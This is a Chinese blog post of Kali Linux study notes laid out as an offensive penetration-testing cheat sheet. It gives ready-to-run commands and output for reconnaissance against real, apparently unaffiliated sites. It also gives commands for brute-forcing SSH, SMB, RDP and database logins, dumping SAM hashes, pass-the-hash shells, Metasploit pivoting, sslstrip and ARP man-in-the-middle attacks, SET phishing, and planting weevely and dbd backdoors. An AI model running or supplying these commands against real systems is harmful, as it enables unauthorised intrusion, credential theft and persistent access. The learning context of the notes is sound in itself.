Kali linux 自学心得

  一.kali 安全渗透的一般测试 流程

  1.信息收集

  目标在线主机,域名信息,邮箱地址,常用密码,同网段信息,子域名信息,指纹信息,端口信息

  2.漏洞分析

  cisco工具集(cisoco工具)

  fuzzing工具集

  openvas

  开源评估软件

  扫描工具集

  数据库评估软件

  3.漏洞利用

  4.权限维持(创建一个后门)

  5.文档编辑

  二.谷歌黑客(goole hacker)

  1.通过互联网

  searchdns.netcraft.com DNS查询

  shodaning.com大数据

  http://www.exploit-db.com/google-dorks/

  1 theHarverster信息搜集工具

  theharvester -d microsoft.com -l 500 -b google

  theharvester -d microsoft.com -b pgp

  theharvester -d microsoft -l 200 -b linkedin

  theharvester -d microsoft.com -l 500 -b all

  2 metagoolefil

  Usage: metagoofil options

  -d: domain to search

  -t: filetype to download (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)

  -l: limit of results to search (default 200)

  -h: work with documents in directory (use "yes" for local analysis)

  -n: limit of files to download

  -o: working directory (location to save downloaded files)

  -f: output file

  Examples:

  metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html

  metagoofil.py -h yes -o applefiles -f results.html (local dir analysis)

  三.信息搜集之目标获取

  域名系统是因特网的一项服务,它作为域名和IP地址相互映射的一个分布式的数据库

  从给定一个主域名到一个子域名的信息收集,是对目标的获取与整理。dnsmap,dnsenum,fierce,dnsdict6

  DNS区域传送指得是一台备用服务器使用来自主服务器的数据刷新自己的域数据库。这为运行中的dns服务提供了一定的冗余度,其目的是为了防止主的域名服务器因意外故障变得不可用是影响到整个域名的解析。

  一般来说,DNS区域传送操作只在网络里真的有备用域名DNS服务器时,才有必要用到,但许多DNS服务器却别错误地配置成只要有client发出请求,就会向对方提供一个zone数据库的详细信息。

  由此暴露出威胁:一旦黑客列出某个特定的zone的所有主机,收集域信息,即可选择性的攻击目标,找出未公开使用的IP地址,绕过基于网络的访问控制。

  比如访问163,可以把所有的IP地址全部列出来,公开的和不公开的,攻击者就可以选择一些弱的IP来进行攻击。

  使用dig进行域名解析(windows nklookup)

  使用dig进行域传送漏洞

  子域名枚举工具的介绍与使用

  dig NS www.secsino.com

  secsino.com.  5 IN NS ns3.cdncenter.com.

  secsino.com.  5 IN NS ns6.cdncenter.com.

  secsino.com.  5 IN NS ns4.cdncenter.com.

  secsino.com.  5 IN NS ns5.cdncenter.com.

  secsino.com.  5 IN NS ns2.cdncenter.com.

  secsino.com.  5 IN NS ns1.cdncenter.com.

  一个6个

  来测试是否有域传送漏洞信息

  dig axfr @ns1.cndcenter.com secsino.com

  DNS分析工具

  fierce

  fierce -dns www.secsino.com

  进行查询域传送漏洞,如果没有进行枚举和破解

  dnsmap secsino.com

  dnsdict6 -4 secsino.com

  四.信息收集和主机探测

  netenum 192.168.1.1/24 >test

  是通过ping来查看主机是否在线,不是特别靠谱,如果对方有防火墙就不可以了。可以生成一个列表。

  fping -g ip

  可以查看那些主机是存活的。

  nbtscan -r 172.17.135.0/24

  nbtscan -r 172.17.135.0/24

  Doing NBT name scan for addresses from 172.17.135.0/24

  IP address       NetBIOS Name     Server    User             MAC address

  ——————————————————————————

  172.17.135.1     PC-20141108YKCA  <server>  <unknown>        24:b6:fd:1a:87:dd

  172.17.135.2     REDBULL          <server>  <unknown>        00:0c:29:09:bb:e8

  172.17.135.3     TXD-1419165F468  <server>  <unknown>        00:0c:29:d2:45:88

  172.17.135.131   BOBO             <server>  <unknown>        8c:89:a5:27:b5:b6

  172.17.135.140   DYJ              <server>  <unknown>        08:10:76:df:4d:83

  arping 172.17.135.4

  可以查看到mac地址的

  嗅探内网包(借助于一些ARP协议包的扫描)

  netdiscover -h

  Currently scanning: 192.168.224.0/16   |   Screen View: Unique Hosts

  5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300

  _____________________________________________________________________________

  IP            At MAC Address      Count  Len   MAC Vendor

  —————————————————————————–

  192.168.149.2   00:50:56:ef:8b:c6    03    180   VMWare, Inc.

  192.168.149.1   00:50:56:c0:00:08    01    060   VMWare, Inc.

  192.168.149.254 00:50:56:fa:94:bd    01    060   VMWare, Inc.

  dmitry cidp.edu.cn

  可以看到一些注册人,和子域名的信息

  wafw00f http://www.cidp.edu.cn

  看是否有waf有保护,先用一个黑名单进行发送,然后看看发送回来有没有。

  Checking http://www.cidp.edu.cn

  Generic Detection results:

  No WAF detected by the generic detection

  Number of requests: 13

  对目标是否存在负载均衡检测器工具

  可以检测多个IP地址映射到单个域名

  lbd www.cidp.edu.cn

  五.信息搜集之主机扫描

  (课程目的,课程介绍)

  1主机探测 版本探测 系统探测 支持探测脚本的编写

  https 443 weblogic701 oracle 1521

  nmap的使用

  nmap -iL target.txt 保存到一个列表

  zenmap

  六.信息搜集之指纹识别

  1.banner抓取最简单最基础,不需要专门的工具就可以做。banner抓取是应用程序的指纹识别而不是操作系统的识别。

  curl -I www.cidp.edu.cn

  curl -I www.cidp.edu.cn

  HTTP/1.1 200 OK

  Date: Mon, 01 Dec 2014 11:24:42 GMT

  Server: Apache/2.0.59 (Unix)

  Last-Modified: Mon, 01 Dec 2014 07:12:49 GMT

  ETag: "ee8001-6939-568a5e40"

  Accept-Ranges: bytes

  Content-Length: 26937

  Content-Type: text/html

  有时候Telnet也可以进行探测,nc有时候也可以。

  nmap -sV -Pn -sT www.cidp.edu.cn -p80

  xprobe2 目标地址 对于老系统比较好

  被动指纹识别工具

  p0f    进行被动抓取数据包

  web指纹识别

  whatweb www.cidp.edu.cn

  http://www.cidp.edu.cn [200] ActiveX[Flash-ActiveX][d27cdb6e-ae6d-11cf-96b8-444553540000], Adobe-Flash, Apache[2.0.59], Country[CHINA][CN], Frame, HTTPServer[Unix][Apache/2.0.59 (Unix)], IP[211.71.233.21], JQuery, Meta-Author[%E5%A4%A7%E6%B1%89%E7%BD%91%E7%BB%9C], Object["http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0]["clsid:d27cdb6e-ae6d-11cf-96b8-444553540000], Script[javascript,text/javascript], Title[%E9%98%B2%E7%81%BE%E7%A7%91%E6%8A%80%E5%AD%A6%E9%99%A2]

  探取cms识别工具

  wpscan -u www.91ri.org

  七.信息搜集 协议分析

  针对smb利用工具

  acccheck  主要检查共享连接 ipc$ admin$,利用用户名和密码来进行攻击。

  amples

  Attempt the 'Administrator' account with a [BLANK] password.

  acccheck -t 10.10.10.1

  Attempt all passwords in 'password.txt' against the 'Administrator' account.

  acccheck -t 10.10.10.1 -P password.txt

  Attempt all password in 'password.txt' against all users in 'users.txt'.

  acccehck -t 10.10.10.1 -U users.txt -P password.txt

  Attempt a single password against a single user.

  acccheck -t 10.10.10.1 -u administrator -p password

  smtp-user-enum 来查看有哪些邮箱等等

  $ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1

  $ smtp-user-enum.pl -M EXPN -u admin1 -t 10.0.0.1

  $ smtp-user-enum.pl -M RCPT -U users.txt -T mail-server-ips.txt

  $ smtp-user-enum.pl -M EXPN -D example.com -U users.txt -t 10.0.0.1

  sslscan ip  查看证书,查看是那种加密方式,最后可以得到一些公钥信息

  数据包分析工具 wireshark

  八.openvas安装与使用

  做出作为一个nessus的子工具,也是一个综合扫描的子工具。

  先进行安装

  openvas-check-setup 检查更新

  openvas-mkcert 安装证书(后面全部选择默认)

  openvas-nvt-sync 更新一些包

  openvas-mkcert-client -n om -i 为客户端创建证书

  证书创建成功后,必须创建一个用户进行登录

  openvasad -c add_user -n root -r Admin

  openvassd 必须加载一个插件的加载

  openvasmd –rebuild

  更新漏洞库内容

  openvas-scapdata-sync 更新一些漏洞信息

  openvas-certdata-sync

  更新完以后可以运行 openvasmd –rebuild

  更新完以后,需要结束openvassd进程,重新启动服务,使用openvas-check-setup检查无误。

  openvas-start

  openvasmd  管理那个模块没有开启,手动开启

  gsad –listen=0.0.0.0 –port=9392 –alisten=127.0.0.1 –aport=9390 –http-only

  默认端口是9392端口打开的

  https://localhost:9392/就可以进行登录

  九.web扫描工具的应用

  1 golismero scan http://secsino.com

  2 nikto -h www.secsino.com

  nikto -h www.secsino.com -p 80,445,21 对指定端口进行扫描

  lynis 系统信息收集工具

  lynis –cheak–all

  默认为当前的操作系统

  unix-privesc-check standard

  十.漏洞分析之web爬行

  内部字典存放的位置

  /usr/shell/wordlists

  1.apche-users -h 172.17.135.4  -l /usr/share/wordlists/apache-user2.0.txt -p 80 -s 0 -e 403 -t 10

  这个就是枚举的过程,判断目录是否存在。

  2.cutycap –url=http://www.baidu.com –out=baidu.png

  相当于对百度网站直接做了一个截图(快照)

  3.强大的目录扫描工具

  dirb http://172.17.135.3

  4.dirbuster 图形化的界面工具

  5.vega 相当于awvs ,但是不是商业化软件

  6.webslayer

  web测试,暴力攻击

  十一.漏洞扫描工具

  cadaver

  root@kaifeng:~# cadaver –help

  Usage: cadaver [OPTIONS] http://hostname[:port]/path

  Port defaults to 80, path defaults to '/'

  Options:

  -t, –tolerant            Allow cd/open into non-WebDAV enabled collection.

  -r, –rcfile=FILE         Read script from FILE instead of ~/.cadaverrc.

  -p, –proxy=PROXY[:PORT]  Use proxy host PROXY and optional proxy port PORT.

  -V, –version             Display version information.

  -h, –help                Display this help message.

  Please send bug reports and feature requests to <cadaver@webdav.org>

  cadaver是一个用来浏览和修改webdav共享的Unix命令行程序,就像subversion客户端,它使用了neon的http库,不需要惊讶,neon和cadaver人作者是同一个人。cadaver是自由软件。使用cadaver就像使用命令行的FTP程序,因此他很适合基本的webdav调试。它可以以压缩的方式上传和下载文件,也会检验属性,拷贝,移动和锁定和检索文件。

  1.cadaver http://172.17.135.22/dav/

  可以put get 等等一系列操作和iisput差不多

  davtest可以自动上传一个漏洞文件,一些木马文件

  2.deblaze  xss或者web会用到

  3.fimap 远程文件和本地的漏洞扫描文件,会检测一些远程和本地包含漏洞测试。

  fimap -u "路径" –force-run

  就可以检测到可以读取那些内容

  如果get一个webshell

  fimap -x –force-run 根据提示来进行操作,上传一个shell,然后在进行提权。

  4.Grabber web漏洞扫描器

  root@kaifeng:~# grabber -h

  Usage: grabber.py [options]

  Options:

  -h, –help            show this help message and exit

  -u ARCHIVES_URL, –url=ARCHIVES_URL

  Adress to investigate

  -s, –sql             Look for the SQL Injection

  -x, –xss             Perform XSS attacks

  -b, –bsql            Look for blind SQL Injection

  -z, –backup          Look for backup files

  -d SPIDER, –spider=SPIDER

  Look for every files

  -i, –include         Perform File Insertion attacks

  -j, –javascript      Test the javascript code ?

  -c, –crystal         Simple crystal ball test.

  -e, –session         Session evaluations

  eg:grabber –spider 1 –sql –xss –url http://172.17.135.22/

  5. joomscan 针对joomlacms来进行测试

  6. skipfish 是Google出品的一款自动化网络安全扫描工具

  skipfish -o ~/home/kaifeng(自己创建的目录) 很好工具http://www.cidp.edu.cn

  7.uniscan-gui 一款图形化界面

  8.W3af 是一个应用程序攻击检查文件,支持许多插件

  9.wapiti 的工作方式和nikto差不多

  python wapiti.py http://172.17.135.22 -v 2

  可以检测文件处理错误(本地和远程)数据库注入

  xss注入 xss注入 ldap注入 命令执行检测(eval(),system(),passtru()。。)crlf注射入(http响应,session固定等等)

  root@kaifeng:~# wapiti http://www.cidp.edu.cn

  Wapiti-2.2.1 (wapiti.sourceforge.net)

  Traceback (most recent call last):

  File "/usr/bin/wapiti", line 444, in <module>

  wap.browse(crawlerFile)

  File "/usr/bin/wapiti", line 238, in browse

  self.urls, self.forms = self.HTTP.browse(crawlerFile)

  可以爬取一些信息

  10.webshag-gui 综合的条用一些插件

  11.websploit 扫描远程和分析系统漏洞。可以快速的扫描

  wsf > show modules

  Web Modules   Description

  ——————-  ———————

  web/apache_users  Scan Directory Of Apache Users

  web/dir_scanner   Directory Scanner

  web/wmap   Information Gathering From Victim Web Using (Metasploit Wmap)

  web/pma    PHPMyAdmin Login Page Scanner

  web/cloudflare_resolver  CloudFlare Resolver

  Network Modules   Description

  ——————-  ———————

  network/arp_dos   ARP Cache Denial Of Service Attack

  network/mfod   Middle Finger Of Doom Attack

  network/mitm   Man In The Middle Attack

  network/mlitm   Man Left In The Middle Attack

  network/webkiller  TCP Kill Attack

  network/fakeupdate  Fake Update Attack Using DNS Spoof

  network/arp_poisoner  Arp Poisoner

  Exploit Modules   Description

  ——————-  ———————

  exploit/autopwn   Metasploit Autopwn Service

  exploit/browser_autopwn  Metasploit Browser Autopwn Service

  exploit/java_applet  Java Applet Attack (Using HTML)

  Wireless / Bluetooth Modules  Description

  ——————-  ———————

  wifi/wifi_jammer  Wifi Jammer

  wifi/wifi_dos   Wifi Dos Attack

  wifi/wifi_honeypot  Wireless Honeypot(Fake AP)

  bluetooth/bluetooth_pod  Bluetooth Ping Of Death Attack

  十二.数据库漏洞工具

  1.tnscmd10g 不经常用

  2.sqlsus 开放源代码MySQL注入和接管工具

  root@kaifeng:~# sqlsus

  sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

  Usage:

  sqlsus [options] [config file]

  Options:

  -h, –help                    brief help message

  -v, –version                 version information

  -e, –execute <commands>      execute commands and exit

  -g, –genconf <filename>      generate configuration file

  sqlsus -g test.comf 生成一个配置文件,然后进行编辑

  修改 our $url_start="";写入地址

  启动并且调试

  sqlsus test.conf 获取数据库数据

  查看全部数据库名字

  sqlsus>get database

  sqlsus>set database 设定数据库

  sqlsus>set database mysql 选定为MySQL数据库

  sqlsus>get tables 获取为MySQL的数据库表

  3.sqlninja 主要针对sqlserver数据库,来返回一个xp_cmdshell,对sa口令的强力攻击

  root@kaifeng:~# sqlninja

  Sqlninja rel. 0.2.6-r1

  Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>

  Usage: /usr/bin/sqlninja

  -m <mode> : Required. Available modes are:  //指定攻击模块,有以下几个

  t/test – test whether the injection is working  #测试连接是否是注入点

  f/fingerprint – fingerprint user, xp_cmdshell and more  #指纹识别,判断用户,数据库,xp_cmdshell是否能用等等

  b/bruteforce – bruteforce sa account  #暴力破解sa密码,可以使用-w指定字典,也可以不使用字典,这样sqlninja就会自己穷举

  e/escalation – add user to sysadmin server role  #提权用,必须用-p指定sa的password,成功就会把当前数据库加入到sa组里面

  x/resurrectxp – try to recreate xp_cmdshell  #尝试恢复xp_cmdshell

  u/upload – upload a .scr file   #使用get和post上传二进制文件,-p可以指定sa的password,-g表示只生成上传文件,但并不上传

  s/dirshell – start a direct shell  # 获得目标主机的shell

  k/backscan – look for an open outbound port  #查看开放的端口

  r/revshell – start a reverse shell   #反弹会一个shell,和dirshell相反

  d/dnstunnel – attempt a dns tunneled shell  #指定使用DNS作为传输通道,可用-p指定sa的password,为什么有这个模式。因为可能服务器连icmp都禁止。同样想要使用这个模式得先用upload模式上传dnstun.exe

  i/icmpshell – start a reverse ICMP shell  #档dirshell和revshell都失败的情况下,可以用这个模式把shell藏在icmp里,但是先要上传imcpsh.exe(在upload模式里)

  c/sqlcmd – issue a 'blind' OS command   #以上方法都失败之后,可以用它执行简单的cmd命令,可惜的是没回回显

  m/metasploit – wrapper to Metasploit stagers  #使用metasploit作为shell

  -f <file> : configuration file (default: sqlninja.conf)  #指定配置文件,sqlninja没有类似sqlmap的“-u”参数,注入网址是写在配置文件里的,默认是sqlninja.conf。 用数字(0,1,2,3,4)来指定数据库。

  -p <password> : sa password

  -w <wordlist> : wordlist to use in bruteforce mode (dictionary method

  only)

  -g : generate debug script and exit (only valid in upload mode)

  -v : verbose output

  -d <mode> : activate debug

  1 – print each injected command

  2 – print each raw HTTP request

  3 – print each raw HTTP response

  all – all of the above

  …see sqlninja-howto.html for details

  默认参数也要写到配置文件里面,默认为sqlninja.conf

  sqlmap

  sqlmap -u "" –cookie='PHPSESSID=;secsicuty=low'

  十三.web代理

  代理工具数据,进行抓包改包,暴力攻击等等一些操作

  1.burp suite 代理代表的一些工具

  2.owasp-zap

  3.vega 有一个代理

  4.webscarab

  webscarab一款代理软件,包括http代理,网络爬行、网络蜘蛛,回话ID分析,自动脚本接口,模糊测试工具,web格式的编码/解码,web服务描述语言和soap解析器等功能模块。webscarab基于gun协议,使用Java编写,是webgoat中所使用的工具之一。

  十四.漏洞分析工具fuzz

  1.bed 能够检查缓存区溢出,格式串漏洞,整数溢出

  bed -s FTP -t 172.17.132.2 -p 21 -o 5

  2.ohrwurm 主要是rtp

  3.wfuzz web应用的模糊测试工具,可以进行web应用暴力拆解,也支持对网站目录,登录信息,应用资源文件等的暴力猜解,还可以进行get及post参数的猜解,sql注入,xss漏洞的测试。改工具所有功能都依赖于字典。

  wfuzz -c -z file,common.txt –hc 404 -o html http://www.baidu.com/FUZZ 2>tes.html

  wfuzz -c -z file,users.txt -z file,pass.txt –hc 404 http://www.site.com/log.asp?user=FUZZ&pass=FUZZ

  登录页面口令猜解,忽略404页面

  wfuzz -c -z range,1-10 –hc=BBB http://www.site.com/FUZZ{something}

  页面数目猜解,与burp不同的是,它更轻量级。

  4.xsser 命令行版本和界面版本

  xsser -u "http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=" –cookie="PHPSESSID=3f0cbd75725ed1a9b5d47396c4aeb2a7;security=low" -v

  [*] List of possible XSS injections:

  ===========================================================================

  [I] Target: http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=

  [+] Injection: http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=/">a01a46f10d098c521b4eb470e82ea23f

  [-] Method: xss

  [-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

  十五.在线密码攻击

  1.cewl 是一个很酷的工具,通过爬行网站获取关键信息创建一个密码字典。

  官网:http://digi.ninja/projects/cewl.php

  2.cat 思科审计工具,扫描思科路由器的一般性漏洞:默认密码snmpcommunity字符

  3.findmyhash

  findmyhash MD5 -h hash值 去找所有的网站的接口去破解

  4.hydra

  FTP

  hydra -L user.txt -P pass.txt -F ftp://172.17.135.2

  SSH

  hydra -L user.txt -P pass.txt -F ssh://172.17.135.2:22

  SMB

  hydra -L user.txt -P pass.txt -F smb://172.17.135.2

  MSSQL

  hydra -L user.txt -P pass.txt -F mssql://172.17.135.2:1433

  5.medusa

  medusa -h 172.17.135.2 -u root  -P //wordlist/rockyou.txt -M ssh

  6.NCrack  基本功能相似,突出是3389爆破的功能

  ncrack -vv -U windows.user -P windows.pwd 172.17.135.2:3389,CL=1 -f

  7.onesixtyone 是一个snmp扫描工具,用于找出设备上的snmp community字符,扫描速度非常快。

  8.patator  Python编写,如枚举一个服务用户名和密码

  patator ssh_login host=172.17.135.2 user=root passowrd=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'

  9.phrasendrescher

  10.thc-pptp-bruter 主要针对pptp VPN端点(tcp端口1723)的暴力破解程序。

  十六.密码离线攻击

  1.ophcrack 彩虹表

  2.pyrit  密码无线攻击

  pyrit -r xxx.cap analyze

  开始跑包(单纯字典)

  pyrit -r xxx.cap -i yyy.dic -b ssid attack_passthrough

  也可以将pyrit与crunch结合使用

  crunch 8 8 1234567890 | pyrit -i – -r /file/hack01-cap -b bssid attach_passthrough

  3.rcrack 彩虹表密码哈希工具

  4.rsmangler

  rsmangler -f /test  字典生成工具

  5.bkhive Linux下破解window下哈希的工具

  首先获取win下的文件

  Sam文件: c:windowssystem32configsam

  system文件: c:windowssystem32configsystem

  先用bkhive从system文件生成一个bootkey文件

  bkhive  system bootkey

  再用bootkey和sam文件通过samdump2生成一个密码hash文件

  samdump2 sam bootkey >hashes

  接着只用John破解John hashes即可。

  6.sucrack  借助su命令进行本地root账户的密码破解

  7.truecrack

  十七.密码攻击之哈希传递

  个人感觉主要利用msf(psexec)这个扫描模块来进行传递hash,可以返回来一个payload。

  通过Windows pwdump7.exe 来进行抓取hash

  1.pth-winexe

  pth-winexe -U Administrator和hash //172.17.135.2 cmd

  这样就可以返回一个本地的shell

  2.keimpx

  keimpx -t 172.17.135.2 -c /root/pass.txt -v 2 看pass.txt里面保存的hash来进行一一尝试,是否可以进行连接

  3.metaspoloit

  exploit/windows/smb/psexse

  十八.密码无线的破解

  十九.metasploit

  在跳板机子获取一定权限后,需要积极的向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的meterpreter后门,可以使系列的操作更容易。

  1.首先我们先看主机网卡信息,看有多少主机

  2.如果我们拿到shell ip地址是 172.17.135.2,内网主机为10.0.0.1,因为内网ip我们是无妨访问的。

  3.首先我们先meterpreter里面增加一条路由

  run autoroute -s 10.0.0.1 就把我们172段地址加入里面了

  4.为了访问,我们开一个socks代理模块

  use auxiliary/server/socks

  exploit

  这个时候我们已经创建一个代理了,然后把kali浏览器的代理设置成127.0.0.1 端口设置成1080,然后在访问10.0.0.2,就可以访问了内网的计算机了。

  run arp_scanner -h 经常查看内网主机

  run arp_scanner -r 10.0.0.1/24

  二十.kali漏洞利用工具beff

  默认的IP http://127.0.0.1:3000/ui/authentication

  beef-xss提供了一个测试页面

  http://127.0.0.1:3000/demos/basic.html

  最重要的一项是把beef和metasploit联合起来。下面是配置命令

  cd /usr/share/beef-xss/

  vim config.yaml //把metaspoloit那一项改成true

  cd /extension/metasploit

  nano config.yaml  //修改host和call_back都改成主机地址

  然后打开msfconsole输入以下命令

  load msgrpc ServerHost=主机ip Pass=abc123

  cd /usr/share/beef-xss/

  ./beef -x 重新加载metasploit模块

  这时候重启一下服务

  service beef-xss restart

  二十一.kali漏洞利用set工具(社会工程会攻击)

  1 命令行输入 setoolkit打开set套件

  输入1为社会工程会攻击

  1鱼叉式攻击 2 网站攻击框架 3 介质感染攻击 4 创建payload攻击 5群发邮件攻击 6基于arduino的攻击 7短信欺骗攻击 8无线接入点攻击 9二维码攻击 10 powershell攻击 11 第三方模块

  1.鱼叉式攻击主要目的发送存在恶意软件的钓鱼软件,相应的payload模块可以选择。

  2.开放一个webserver服务,如果对方访问此页面,若系统存在漏洞触发条件,则会被植入后门。 如Java applet attack 方法就需要目标有Java运行环境。为了仿真,你可以选择自建模板或克隆一个网站。(重点演示,可以结合毒化和抓包来进行欺骗内网机子和劫持)

  3 介质感染攻击

  借助autorun.inf执行exploit得到一个返回的shell,也可以结合metasploit的后门

  fasttrack也被整理到setoolkit里面。

  二十二.嗅探欺骗和中间人攻击

  linux下的中间人攻击套路都是一样的,这里介绍进行ARP欺骗,DNS欺骗和嗅探以及回话劫持(cookie)的方法。

  1 为kali设置开启端口转发

  echo 1 > /proc/sys/net/ipv4/ip_forward

  2设置ssltrip

  为了劫持ssl数据,需要使https数据变为https

  iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8081

  让ssltrip在8081端口监听

  sslstrip -l 8081

  我们使用的工具ettercap这个中间人攻击工具,如果是第一次使用,需要设置配置

  配置文件/etc/ettercap/etter.conf 首先要将ec_uid,ec_gid都变为0

  在把配置文件里面,在linux下面,把下面两行注释警号全部去掉

  第一步打开 ettercap -G 图形化界面

  二十三.web后门

  1.weevely 仅限php,相当于菜刀的一款工具

  weevely generate test ~/1.php

  连接:weevely http://172.17.135.3/1.php test(密码)

  2.webacoo

  webacoo -t -u http://172.17.135.3/2.php

  系统后门 首先我们先提取进程 ps aux | grep ~/bin/bash"

  1.系统端:dbd -l -p 2333(bash进程号) -e /bin/bash -k password

  连接端:dbd 127.0.0.1 2333 -k password

  连接以后,机子并没有什么反应,但是直接执行命令就可以了。

  2.intersect

  数字1 创建一个shell

  然后依次为 bshell   creds  portscan  自由加了三个模块。添加完以后就:create,然后输入shell,还需要绑定端口 5555,远程主机 172.17.135.3 远程端口 23333 。这样就设置完成了。完成以后,下面会给出保存的路径。,默认为.py文件。

  执行文件

  ./shell.py -b 绑定  那么这个时候就绑定这个端口了

  我们在远程用nc进行连接

  nc -nvv 127.0.0.1 5555  这个时候就得到一个shell了。

  二十四.权限维持之tunnel

  1.cryptcat  使用方法与dbd 方法相似

   二十五.压力测试

  所谓压力测试,就是攻击服务器所能承受的范围,所谓的ddos攻击。

  主要是消耗某一种资源,来让服务器不正常。

  二十六. 数字取证工具

  1.peepdf是一个使用Python编写的PDF文件分析工具,它可以检测恶意的pdf文件。其设计目标是为安全研究人员提供的pdf分析中可能用到的所有组件,无需使用3或4种工具来完成同一件任务。

  2.反数字取证 用来检测 linux下面关键命令是否被注入了后门。

  3.内从取证工具集

  volatility是开源的window,linux等内从取证分析工具,有Python编写成,命令行操作,支持各种操作。

  http://www.freebuf.com/articles/system/26763.html

  4 binwalk 来判断是什么文件格式,原始文件是什么。

  5 dff 是一个简单但强大的数字取证工具辅助工具,它具有一个灵活的模块系统。具有多种功能,包括:恢复错误或奔溃导致文件丢失,证据的研究和分析等。pdf提供了一个强大的体系结构和一些有用的模块。

  二十七.报告工具与系统服务

  1.dradis 基于浏览器的在线笔记

 

发表评论

邮箱地址不会被公开。 必填项已用*标注